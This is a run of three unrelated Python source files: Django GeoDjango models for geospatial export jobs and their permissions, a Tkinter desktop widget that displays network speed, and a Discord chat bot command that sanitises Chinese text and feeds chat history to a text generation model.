verbose_name="Mercator extent for export region", srid=3857, default=""
)
the_geog = models.MultiPolygonField(verbose_name="Geographic extent for export region", geography=True, default="")
properties = models.JSONField(default=dict)
class Meta: # pragma: no cover
managed = True
db_table = "regions"
def __str__(self):
return "{0}".format(self.name)
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
self.the_geog = GEOSGeometry(self.the_geom)
self.the_geom_webmercator = self.the_geom.transform(ct=3857, clone=True)
super(Region, self).save(*args, **kwargs)
class RegionalPolicy(UIDMixin, TimeStampedModelMixin):
name = models.CharField(max_length=255)
region = models.ForeignKey(Region, on_delete=models.CASCADE, related_name="policies")
providers = models.ManyToManyField(DataProvider, related_name="regional_policies")
policies = models.JSONField()
policy_title_text = models.CharField(max_length=255)
policy_header_text = models.TextField(null=True, blank=True)
policy_footer_text = models.TextField(null=True, blank=True)
policy_cancel_text = models.CharField(max_length=255, null=True, blank=True)
policy_cancel_button_text = models.CharField(max_length=255)
justification_options = models.JSONField()
class Meta:
verbose_name_plural = "Regional Policies"
def __str__(self):
return self.name
class RegionalJustification(UIDMixin, TimeStampedModelMixin):
"""
Model that stores regional justification selections made by users.
"""
justification_id = models.IntegerField()
justification_name = models.CharField(max_length=255)
justification_suboption_value = models.TextField(null=True, blank=True)
regional_policy = models.ForeignKey(RegionalPolicy, on_delete=models.CASCADE, related_name="justifications")
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="justification_user")
def __str__(self):
return str(self.uid)
class VisibilityState(Enum):
PRIVATE = "PRIVATE"
PUBLIC = "PUBLIC"
SHARED = "SHARED"
class Job(UIDMixin, TimeStampedModelMixin):
"""
Model for a Job.
"""
# the "choices" setting for the django admin page drop down list requires a type that can be indexed
visibility_choices = []
for value in VisibilityState:
visibility_choices.append((value.value, value.value))
def __init__(self, *args, **kwargs):
if not args:  # Fixture loading passes positional args, so skip the conversion in that case.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
kwargs["the_geom_webmercator"] = convert_polygon(kwargs.get("the_geom_webmercator")) or ""
kwargs["the_geog"] = convert_polygon(kwargs.get("the_geog")) or ""
super().__init__(*args, **kwargs)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, related_name="owner")
name = models.CharField(max_length=100, db_index=True)
description = models.CharField(max_length=1000, db_index=True)
event = models.CharField(max_length=100, db_index=True, default="", blank=True)
region = models.ForeignKey(Region, null=True, blank=True, on_delete=models.CASCADE)
preset = models.ForeignKey(DatamodelPreset, on_delete=models.CASCADE, null=True, blank=True)
published = models.BooleanField(default=False, db_index=True) # publish export
visibility = models.CharField(max_length=10, choices=visibility_choices, default=VisibilityState.PRIVATE.value)
featured = models.BooleanField(default=False, db_index=True) # datapack is featured
the_geom = models.MultiPolygonField(verbose_name="Extent for export", srid=4326, default="")
the_geom_webmercator = models.MultiPolygonField(verbose_name="Mercator extent for export", srid=3857, default="")
the_geog = models.MultiPolygonField(verbose_name="Geographic extent for export", geography=True, default="")
original_selection = models.GeometryCollectionField(
verbose_name="The original map selection", srid=4326, default=GeometryCollection, null=True, blank=True
)
include_zipfile = models.BooleanField(default=False)
json_tags = models.JSONField(default=dict)
last_export_run = models.ForeignKey(
"tasks.ExportRun", on_delete=models.DO_NOTHING, null=True, related_name="last_export_run"
)
projections = models.ManyToManyField(Projection, related_name="projections")
class Meta: # pragma: no cover
managed = True
db_table = "jobs"
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
self.the_geog = GEOSGeometry(self.the_geom)
self.the_geom_webmercator = self.the_geom.transform(ct=3857, clone=True)
super(Job, self).save(*args, **kwargs)
def __str__(self):
return "{0}".format(self.name)
@property
def overpass_extents(self):
"""
Return the export extents in order required by Overpass API.
"""
extents = GEOSGeometry(self.the_geom).extent # (w,s,e,n)
# overpass needs extents in order (s,w,n,e)
overpass_extents = "{0},{1},{2},{3}".format(str(extents[1]), str(extents[0]), str(extents[3]), str(extents[2]))
return overpass_extents
@property
def extents(self):
return GEOSGeometry(self.the_geom).extent # (w,s,e,n)
@property
def filters(self):
"""
Return key=value pairs for each tag in this export.
Used in utils.overpass.filter to filter the export.
"""
# Command-line key=value filters for osmfilter
filters = []
for tag in self.json_tags:
kv = "{0}={1}".format(tag["key"], tag["value"])
filters.append(kv)
return filters
@property
def categorised_tags(self):
"""
Return tags mapped according to their geometry types.
"""
points = set()
lines = set()
polygons = set()
for tag in self.json_tags:
if "point" in tag["geom"]:
points.add(tag["key"])
if "line" in tag["geom"]:
lines.add(tag["key"])
if "polygon" in tag["geom"]:
polygons.add(tag["key"])
return {
"points": sorted(list(points)),
"lines": sorted(list(lines)),
"polygons": sorted(list(polygons)),
}
@property
def bounds_geojson(self):
return serialize("geojson", [self], geometry_field="the_geom", fields=("name", "the_geom"))
@property
def attribute_classes(self):
providers = [provider_task.provider for provider_task in self.data_provider_tasks.all()]
return AttributeClass.objects.filter(data_providers__in=providers).distinct()
def get_last_run(self):
return self.runs.last()
class DataProviderTask(models.Model):
"""
Model for a set of tasks assigned to a provider for a job.
"""
id = models.AutoField(primary_key=True, editable=False)
uid = models.UUIDField(unique=True, default=uuid.uuid4, editable=False, db_index=True)
provider = models.ForeignKey(DataProvider, on_delete=models.CASCADE, related_name="data_provider")
job = models.ForeignKey(Job, on_delete=models.CASCADE, null=True, related_name="data_provider_tasks")
formats = models.ManyToManyField(ExportFormat, related_name="formats")
min_zoom = models.IntegerField(blank=True, null=True)
max_zoom = models.IntegerField(blank=True, null=True)
def __str__(self):
return "{0} - {1}".format(str(self.uid), self.provider)
class RegionMask(models.Model):
"""
Model to hold region mask.
"""
def __init__(self, *args, **kwargs):
if not args:  # Fixture loading passes positional args, so skip the conversion in that case.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
super().__init__(*args, **kwargs)
id = models.IntegerField(primary_key=True)
the_geom = models.MultiPolygonField(verbose_name="Mask for export regions", srid=4326)
class Meta: # pragma: no cover
managed = False
db_table = "region_mask"
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
super(RegionMask, self).save(*args, **kwargs)
class ExportProfile(models.Model):
"""
Model to hold Group export profile.
"""
name = models.CharField(max_length=100, blank=False, default="")
group = models.OneToOneField(Group, on_delete=models.CASCADE, related_name="export_profile")
max_extent = models.IntegerField()
class Meta: # pragma: no cover
managed = True
db_table = "export_profiles"
def __str__(self):
return "{0}".format(self.name)
class UserJobActivity(models.Model):
CREATED = "created"
VIEWED = "viewed"
UPDATED = "updated"
DELETED = "deleted"
user = models.ForeignKey(User, null=True, on_delete=models.CASCADE)
job = models.ForeignKey(Job, null=True, on_delete=models.CASCADE)
type = models.CharField(max_length=100, blank=False)
created_at = models.DateTimeField(default=timezone.now, editable=False)
def __str__(self):
return "%s %s %s %s" % (self.user, self.job, self.type, self.created_at)
def convert_polygon(geom=None):
if geom and isinstance(geom, Polygon):
return MultiPolygon(geom, srid=geom.srid)
return geom
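# A minimal sketch of the Polygon -> MultiPolygon promotion performed by
# convert_polygon. It assumes the GEOS library backing django.contrib.gis is
# installed; the square below is an arbitrary example geometry. Not called anywhere.
def _example_convert_polygon():
    square = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)), srid=4326)
    return convert_polygon(square)  # -> MultiPolygon containing the square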
def bbox_to_geojson(bbox=None):
"""
:param bbox: A list [xmin, ymin, xmax, ymax]
:returns: A geojson of the bbox.
"""
bbox = Polygon.from_bbox(bbox)
geometry = json.loads(GEOSGeometry(bbox, srid=4326).geojson)
return {"type": "Feature", "geometry": geometry}
def remove_permissions(model, id):
JobPermission.objects.filter(content_type=ContentType.objects.get_for_model(model), object_id=id).delete()
class JobPermissionLevel(Enum):
NONE = "NONE"
READ = "READ"
ADMIN = "ADMIN"
class JobPermission(TimeStampedModelMixin):
"""
Model associates users or groups with jobs
"""
job = models.ForeignKey(Job, on_delete=models.CASCADE, related_name="permissions")
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField(db_index=True)
content_object = GenericForeignKey("content_type", "object_id")
permission = models.CharField(choices=[("READ", "Read"), ("ADMIN", "Admin")], max_length=10)
# A user should only have one type of permission per job.
class Meta:
db_table = "jobpermission"
constraints = [
models.UniqueConstraint(
fields=["job", "content_type", "object_id", "permission"], name="unique_object_permission_per_job"
),
]
@staticmethod
def get_orderable_queryset_for_job(job: Job, model: Union[Type[User], Type[Group]]) -> QuerySet:
admin: ListOrQuerySet
shared: ListOrQuerySet
unshared: ListOrQuerySet
admin = shared = unshared = []
if job:
job_permissions = job.permissions.prefetch_related("content_object").filter(
content_type=ContentType.objects.get_for_model(model)
)
admin_ids = []
shared_ids = []
for job_permission in job_permissions:
if job_permission.permission == JobPermissionLevel.ADMIN.value:
admin_ids += [job_permission.content_object.id]
else:
shared_ids += [job_permission.content_object.id]
admin_queryset = model.objects.filter(pk__in=admin_ids)
shared_queryset = model.objects.filter(pk__in=shared_ids)
total = admin_ids + shared_ids
unshared_queryset = model.objects.exclude(pk__in=total)
queryset = (
cast(QuerySet, admin_queryset) | cast(QuerySet, shared_queryset) | cast(QuerySet, unshared_queryset)
)
else:
queryset = model.objects.all()
# https://docs.djangoproject.com/en/3.0/ref/models/conditional-expressions/#case
queryset = queryset.annotate(
admin_shared=Case(
When(id__in=admin, then=Value(0)),
When(id__in=shared, then=Value(1)),
When(id__in=unshared, then=Value(2)),
default=Value(2),
output_field=models.IntegerField(),
)
).annotate(
shared=Case(
When(id__in=admin, then=Value(0)),
When(id__in=shared, then=Value(0)),
When(id__in=unshared, then=Value(1)),
default=Value(1),
output_field=models.IntegerField(),
)
)
return queryset
@staticmethod
def jobpermissions(job: Job) -> dict:
permissions: Dict[str, Dict] = {"groups": {}, "members": {}}
for jp in job.permissions.prefetch_related("content_object"):
if isinstance(jp.content_object, User):
permissions["members"][jp.content_object.username] = jp.permission
else:
permissions["groups"][jp.content_object.name] = jp.permission
return permissions
@staticmethod
def userjobs(user, level, include_groups=True):
# super users can do anything to any job
jobs = Job.objects.all()
if user.is_superuser:
return jobs
# Get jobs for groups that the user belongs to
if include_groups:
groups = Group.objects.filter(group_permissions__user=user)
group_query = [
Q(permissions__content_type=ContentType.objects.get_for_model(Group)),
Q(permissions__object_id__in=groups),
]
if level != JobPermissionLevel.READ.value:
group_query.append(Q(permissions__permission=level))
# get all the jobs this user has been explicitly assigned to
user_query = [
Q(permissions__content_type=ContentType.objects.get_for_model(User)),
Q(permissions__object_id=user.id),
]
if level != JobPermissionLevel.READ.value:
user_query.append(Q(permissions__permission=level))
# If not requesting Admin level permission (i.e. to make admin changes), then also include public datasets.
public_query = Q()
if level == JobPermissionLevel.READ.value:
public_query = Q(visibility=VisibilityState.PUBLIC.value)
return jobs.filter(Q(*user_query) | Q(*group_query) | public_query)
@staticmethod
def groupjobs(group, level):
# get all the jobs for which this group has the given permission level
query = [
Q(permissions__content_type=ContentType.objects.get_for_model(Group)),
Q(permissions__object_id=group.id),
]
if level != JobPermissionLevel.READ.value:
query.append(Q(permissions__permission=level))
# If not requesting Admin level permission (i.e. to make admin changes), then also include public datasets.
public_query = Q()
if level == JobPermissionLevel.READ.value:
public_query = Q(visibility=VisibilityState.PUBLIC.value)
return Job.objects.filter(Q(*query) | public_query)
@staticmethod
def get_user_permissions(user, job_uid):
"""
Check what level of permission a user has to a job.
:param user: User obj in question
:param job_uid: Id of the job for which we want the user's permission level
:return: None, READ, or ADMIN depending on what level of permission the user has to the job
"""
permission = None
# All of the permission objects for the job in question.
jps = JobPermission.objects.filter(job__uid=job_uid)
try:
# Check if the user has explicit permissions to the job.
user_permission = jps.get(content_type=ContentType.objects.get_for_model(User), object_id=user.pk)
except JobPermission.DoesNotExist:
user_permission = None
if user_permission:
permission = user_permission.permission
if permission == JobPermissionLevel.ADMIN.value:
# If the users has ADMIN permission we can return.
# If the user does NOT HAVE ADMIN permission we will need to check the groups for implicit ADMIN.
return JobPermissionLevel.ADMIN.value
# Get all the ADMIN level group permissions for the user
users_groups = Group.objects.filter(
group_permissions__user=user, group_permissions__permission=GroupPermissionLevel.ADMIN.value
)
# Check if any of the groups the user is an admin of have group-admin permission to the job.
jp_group_admin = (
jps.filter(content_type=ContentType.objects.get_for_model(Group))
.filter(object_id__in=users_groups)
.filter(permission=JobPermissionLevel.ADMIN.value)
)
# If any of the groups the user is an admin of have admin-group permission
# we know that the user has implicit ADMIN permission to the job.
if jp_group_admin.count() > 0:
return JobPermissionLevel.ADMIN.value
# If the user already has explicit READ permissions we can return without checking for implicit READ via groups.
if permission:
return JobPermissionLevel.READ.value
# Get all the group permissions for groups the user is in.
users_groups = Group.objects.filter(group_permissions__user=user)
# Check if any of the groups the user is in have group-read permission to the job.
jp_group_member = (
jps.filter(content_type=ContentType.objects.get_for_model(Group))
.filter(object_id__in=users_groups)
.filter(permission=JobPermissionLevel.READ.value)
)
# If any of the groups the user is in have READ permissions we can return.
if jp_group_member.count() > 0:
return JobPermissionLevel.READ.value
# If user does not have any explicit or implicit permission to the job we return none.
return ""
def __str__(self):
return "{0} - {1}: {2}: {3}".format(self.content_type, self.object_id, self.job, self.permission)
def __unicode__(self):
return "{0} - {1}: {2}: {3}".format(self.content_type, self.object_id, self.job, self.permission)
def delete(self, *args, **kwargs):
for job_permission in JobPermission.objects.filter(object_id=self.pk):
job_permission.content_type = ContentType.objects.get_for_model(User)
job_permission.object_id = job_permission.job.user.pk
job_permission.save()
super(Group, self).delete(*args, **kwargs)
# https://github.com/python/mypy/issues/2427
Group.delete = delete # type: ignore
def load_provider_config(config: Union[str, dict]) -> dict:
"""
Function deserializes a yaml object from a given string.
"""
try:
if isinstance(config, dict):
return copy.deepcopy(config)
configuration = yaml.safe_load(config) if config else dict()
except yaml.YAMLError as e:
logger.error(f"Unable to load provider configuration: {e}")
raise Exception(e)
return configuration
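# A minimal sketch of load_provider_config on a small YAML snippet; the keys and URL
# below are illustrative placeholders only. Not called anywhere.
def _example_load_provider_config():
    sample = "extent_url: https://example.com/extent.geojson\nconcurrency: 4\n"
    return load_provider_config(sample)  # -> {'extent_url': ..., 'concurrency': 4}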
def clean_config(config: Union[str, dict]) -> dict:
"""
Used to remove adhoc service related values from the configuration.
:param config: A yaml structured string.
:return: A yaml as a dict.
"""
service_keys = [
"cert_info",
"cert_cred",
"concurrency",
"max_repeat",
"overpass_query",
"max_data_size",
"pbf_file",
"tile_size",
]
if isinstance(config, str):
conf = yaml.safe_load(config)
else:
conf = copy.deepcopy(config)
for service_key in service_keys:
conf.pop(service_key, None)
return conf
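# A minimal sketch of clean_config: service-tuning keys such as "concurrency" and
# "max_data_size" are stripped while the rest of the configuration is kept. The
# sample dict is illustrative only and the function is not called anywhere.
def _example_clean_config():
    sample = {"sources": {"info": {"type": "wms"}}, "concurrency": 4, "max_data_size": 100}
    return clean_config(sample)  # -> {'sources': {'info': {'type': 'wms'}}}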
def clean_config_as_str(config: str) -> str:
"""
Used to remove adhoc service related values from the configuration.
:param config: A yaml structured string.
:return: The cleaned configuration as a yaml string.
"""
return yaml.dump(clean_config(config), Dumper=CDumper)
|
netspeed.py
|
import threading
import time
import psutil
from tkinter import Tk,Label,Button,OptionMenu,StringVar,NORMAL,DISABLED,PhotoImage
from tkinter.messagebox import showinfo
import os
import sys
speedUp=None
speedDown=None
bgr='black'
alpha=.9
run=True
interface=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)][0]
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
buttonSelectInterface=None
windowx=0
windowy=0
if(len(interface)==0):
os._exit(0)
if(os.path.exists('C:\\ProgramData\\NetSpeed\\netinterfacedata.log')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','r') as f:
line=str(f.readline()).strip()
interfacelist=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(line in interfacelist):
if(psutil.net_if_stats()[interface].isup):
interface=line
else:
interface=interfacelist[0]
else:
interface=interfacelist[0]
def speedCalc(up,down,timediff=1):
global speedUp,speedDown,run,interface,interface_list_at_startup,buttonSelectInterface
up=0
down=0
while(run):
try:
if(interface in list(dict.keys(psutil.net_if_stats()))):
if(not psutil.net_if_stats()[interface].isup):
interface_list_new=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
previnter=interface
interface=list(set(interface_list_new).difference(interface_list_at_startup))[0] if(len(list(set(interface_list_new).difference(interface_list_at_startup)))>0) else interface
if(previnter!=interface):
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(os.path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
continue
#on_closing()
else:
interface_list_new=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
previnter=interface
interface=list(set(interface_list_new).difference(interface_list_at_startup))[0] if(len(list(set(interface_list_new).difference(interface_list_at_startup)))>0) else interface
if(previnter!=interface):
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(os.path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
continue
sent=psutil.net_io_counters(pernic=True)[interface].bytes_sent
recv=psutil.net_io_counters(pernic=True)[interface].bytes_recv
total=(sent+recv)/1000
unitUp=1
unitDown=1
unitTotal=1
upspeed=(sent-up)/1000
downspeed=(recv-down)/1000
if(len(str(int(upspeed)))>=4):
upspeed=upspeed/1000
unitUp=2
if(len(str(int(downspeed)))>=4):
downspeed=downspeed/1000
unitDown=2
if(len(str(int(total)))>=7):
total=total/1000000
unitTotal=3
elif(len(str(int(total)))>=4):
total=total/1000
unitTotal=2
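            # For example: an upspeed of 1536 KB/s has 4 digits, so it is rescaled to 1.536
            # and unitUp becomes 2, which is rendered as "1.54 MB/s" below; totals with 7+
            # digits of KB are shown in GB the same way.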
speedUp.config(text='{0:.2f} {1}/s'.format(upspeed,'KB' if unitUp==1 else 'MB'))
speedDown.config(text='{0:.2f} {1}/s'.format(downspeed,'KB' if unitDown==1 else 'MB'))
totalUsage.config(text='{0:.2f} {1}'.format(total,'KB' if unitTotal==1 else 'MB' if unitTotal==2 else 'GB'))
time.sleep(timediff)
up=sent
down=recv
        except Exception as e:
            # Ignore transient errors (interface vanished mid-sample, Tk tearing down) and keep polling.
            pass
def resource_path(relative_path):
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
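# Note: under a PyInstaller-frozen build, sys._MEIPASS points at the temporary extraction
# directory, so resource_path("up.png") resolves inside that folder; when run from source
# it resolves next to this script.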
def getnetinterface():
global buttonSelectInterface,interface,bgr,windowx,windowy,interface_list_at_startup
w=175
h=30
x = windowx
y = windowy
if(x<0 or y<0):
x,y=0,0
netinterface = Tk()
netinterface.title("Select Network Interface")
netinterface.geometry('%dx%d+%d+%d' % (w, h, x, y))
netinterface.wm_attributes('-alpha',alpha)
netinterface.wm_attributes('-topmost', 1)
var = StringVar(netinterface)
var.set("Select Network Interface")
def grab_and_assign(event):
global buttonSelectInterface,interface,bgr,interface_list_at_startup
chosen_option = var.get()
interface=chosen_option
if(os.path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
netinterface.destroy()
lst=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
drop_menu = OptionMenu(netinterface, var,*lst, command=grab_and_assign)
drop_menu.config(bg=bgr,fg='white')
drop_menu.grid(row=0, column=0)
netinterface.resizable(0, 0)
netinterface.overrideredirect(1)
netinterface.configure(background=bgr)
netinterface.mainloop()
app=Tk()
xpos,ypos=0,0
butBool=False
totalBool=False
upBool=False
downBool=False
downiconBool=False
totaliconbool=False
interfacebuttonbool=False
infobuttonbool=False
def on_closing():
global app,run
run=False
app.destroy()
os._exit(0)
def move_window(event):
global xpos,ypos,butBool,totalBool,upBool,downBool,downiconBool,totaliconbool,windowx,windowy,interfacebuttonbool,infobuttonbool
if(not butBool and not interfacebuttonbool and not infobuttonbool):
if(totalBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos-50}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos-50
elif(totaliconbool):
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos-50}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos-50
elif(upBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos
elif(downBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos-25}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos-25
elif(downiconBool):
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos-25}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos-25
else:
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos
butBool=False
totalBool=False
upBool=False
downBool=False
downiconBool=False
totaliconbool=False
interfacebuttonbool=False
infobuttonbool=False
def showInfo():
showinfo('Info', 'The interface selected is: \n\"'+interface+'\"\n\nIf you want to change the interface, click on the letter which is below the close button')
def getorigin(eventorigin):
global xpos,ypos
xpos = eventorigin.x
ypos = eventorigin.y
def buttonmotion(event):
global butBool
butBool=True
def totalUsagemotion(event):
global totalBool
totalBool=True
def speedUpmotion(event):
global upBool
upBool=True
def speedDownmotion(event):
global downBool
downBool=True
def speedDowniconmotion(event):
global downiconBool
downiconBool=True
def totaliconmotion(event):
global totaliconbool
totaliconbool=True
def interfacebuttonmotion(event):
global interfacebuttonbool
interfacebuttonbool=True
def infomotion(event):
global infobuttonbool
infobuttonbool=True
# change the transparency when the mouse wheel is scrolled
def scrollmouse(event):
global alpha
if(event.delta<0):
if(alpha>.15):
alpha=alpha-.05
app.wm_attributes('-alpha',alpha)
else:
if(alpha<1.0):
alpha=alpha+.05
app.wm_attributes('-alpha',alpha)
#close window
def exitNetspeed():
global app,run
run=False
app.destroy()
os._exit(0)
app.title('Net Speed')
w=160
h=76
# get screen width and height
ws = app.winfo_screenwidth() # width of the screen
hs = app.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Tk root window
x = ws-w
y = hs-116
windowx=x
windowy=y
app.geometry('%dx%d+%d+%d' % (w, h, x, y))
app.wm_attributes('-alpha',alpha)
app.wm_attributes('-topmost', 1)
uppath = resource_path("up.png")
photo = PhotoImage(file = uppath)
mpUp = photo.subsample(6, 6)
downpath= resource_path("down.png")
photo = PhotoImage(file = downpath)
mpDown = photo.subsample(6, 6)
totalpath= resource_path("updown.png")
photo = PhotoImage(file = totalpath)
mpTotal = photo.subsample(24, 24)
closepath= resource_path("close.png")
photo = PhotoImage(file = closepath)
buttonimg = photo.subsample(11, 11)
infopath= resource_path("info.png")
photo = PhotoImage(file = infopath)
infoimg = photo.subsample(14, 14)
iconUp = Label(app ,text = "Up:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpUp)
iconUp.grid(row = 0,column = 0)
iconDown = Label(app ,text = "Down:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpDown)
iconDown.grid(row = 1,column = 0)
speedUp = Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
speedUp.grid(row = 0,column = 1)
speedDown = Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
speedDown.grid(row = 1,column = 1)
iconTotal = Label(app ,text = "Total:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpTotal)
iconTotal.grid(row = 2,column = 0)
totalUsage= Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
totalUsage.grid(row = 2,column = 1)
buttonClose = Button(app, image=buttonimg,background=bgr,borderwidth=0,command =exitNetspeed,state=DISABLED)
buttonClose.place(x=w-28, y=0)
buttonSelectInterface = Button(app, text=interface[0],borderwidth=0,background=bgr,foreground='white',command =getnetinterface,font='Helvetica 10 bold')
buttonSelectInterface.place(x=w-26, y=26)
info = Button(app, image=infoimg,background=bgr,borderwidth=0,command =showInfo)
info.place(x=w-25, y=54)
app.resizable(0, 0)
app.overrideredirect(1)
app.configure(background=bgr)
app.bind("<Enter>", lambda event: buttonClose.config(state=NORMAL))
app.bind("<Leave>", lambda event: buttonClose.config(state=DISABLED))
# to move the window even when dragging is done by clicking the icons
buttonClose.bind("<B1-Motion>", buttonmotion)
speedUp.bind("<B1-Motion>", speedUpmotion)
speedDown.bind("<B1-Motion>", speedDownmotion)
totalUsage.bind("<B1-Motion>", totalUsagemotion)
iconDown.bind("<B1-Motion>", speedDowniconmotion)
iconTotal.bind("<B1-Motion>", totaliconmotion)
buttonSelectInterface.bind("<B1-Motion>", interfacebuttonmotion)
info.bind("<B1-Motion>", infomotion)
app.bind("<Button 1>",getorigin)
app.bind("<B1-Motion>", move_window)
app.bind("<MouseWheel>", scrollmouse)
app.protocol("WM_DELETE_WINDOW", on_closing)
# Seed the sampler with the current raw byte counters so the first reading is a true per-second delta.
upspeed=psutil.net_io_counters(pernic=True)[interface].bytes_sent
downspeed=psutil.net_io_counters(pernic=True)[interface].bytes_recv
time.sleep(1)
t = threading.Thread(target=speedCalc, args=(upspeed,downspeed,))
t.daemon = True
t.start()
app.mainloop()
|
chat_command.py
|
import threading
from collections import deque
from discord_bot.commands.base_command import BaseCommand
from generation.sanitization import *
class ChatCommand(BaseCommand):
"""
A simple chat bot that responds to messages in a designated channel
"""
COMMAND_OPTION = 'chat'
def __init__(self, client, config, model):
"""
:param client: discord client
:param config: configparser
:param model: generation model
"""
self.client = client
self.model = model
self.config = config[self.COMMAND_OPTION]
self.max_length = int(self.config['max_length'])
self.min_length = int(self.config['min_length'])
self.model_version = self.config['model_version']
channel_ids_str = self.config['channel_ids']
# channel ids are integers
self.allowed_channel_ids = [int(s) for s in channel_ids_str.split(',')]
# fix length queue to track the chat history
self.queue = deque([], maxlen=10)
def get_command_prefix(self):
return self.COMMAND_PREFIX + ' ' + self.COMMAND_OPTION
def get_help_message(self):
        return '接龙游戏'  # "word-chain game"
def execute(self, original_message):
"""
execute generation
:param original_message: discord message object
:return:
"""
thread = threading.Thread(target=self.generate, args=(original_message,))
thread.start()
def get_allowed_channel_ids(self):
return self.allowed_channel_ids
def generate(self, original_message):
# restart a new session
if 'restart' == original_message.content:
self.client.loop.create_task(original_message.channel.send('restarted'))
self.queue = deque([], maxlen=10)
return
# rewrite the last generation
elif 'rewrite' == original_message.content:
self.client.loop.create_task(original_message.channel.send('rewriting...'))
# remove the last generation from the queue
self.queue.pop()
else:
message = self.get_prefix(original_message)
message = message.strip()
message = self.sanitize(message)
message = self.finish_sentence_with_punctuation(message)
# if user input is too long or too short
if len(message) > self.max_length:
self.client.loop.create_task(original_message.channel.send('不能超过800字'))
return
if len(message) < self.min_length:
self.client.loop.create_task(original_message.channel.send('要10个字以上'))
return
# queue the message
self.queue.append(message)
# concatenate all the previously queued message
history = ''.join(self.queue)
# generation logic
generated = self.model.generate(history)
generated = self.remove_incomplete_sentence(generated)
# queue the generated message
self.queue.append(generated)
# send result back
self.client.loop.create_task(original_message.channel.send(generated))
def finish_sentence_with_punctuation(self, sentence):
"""
add period to the end of the sentence
:param sentence:
:return:
"""
punctuation = ['。', '!', '?', '!', '?']
has_tailing_punctuation = list(filter(sentence.endswith, punctuation)) != []
# if a valid punctuation is missing at the end of the sentence
if not has_tailing_punctuation:
sentence = sentence + '。'
return sentence
def remove_incomplete_sentence(self, sentence):
"""
remove the dangling/incomplete part from the end of the sentence
e.g. 夜正长,路也正长,我们忘却了 ==> 夜正长,路也正长,
:param sentence:
:return:
"""
punctuation = ['。', ',', '!', '?', ',', '!', '?']
# tracks the position of the last punctuation
last_punctuation = len(sentence)
for i in range(0, len(sentence)):
if sentence[i] in punctuation:
last_punctuation = i
return sentence[0:last_punctuation + 1]
def get_prefix(self, original_message):
return original_message.content.replace(self.get_command_prefix(), '')
def sanitize(self, prefix):
prefix = ''.join(prefix.split())
prefix = prefix.lower()
# sanitize prefix
prefix = remove_discord_emojis(prefix)
prefix = unescape_html(prefix)
prefix = remove_special_characters(prefix)
prefix = remove_html_xml_tags(prefix)
prefix = remove_urls(prefix)
prefix = convert_and_remove_punctuation(prefix)
prefix = remove_nonchinese_characters(prefix)
return prefix
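if __name__ == '__main__':
    # A small, hedged smoke test of the pure text helpers. They never touch `self`, so
    # they are called unbound with None as a stand-in instance; this assumes the imports
    # at the top of this module (discord_bot, generation.sanitization) resolve.
    print(ChatCommand.finish_sentence_with_punctuation(None, '夜正长,路也正长'))        # appends '。'
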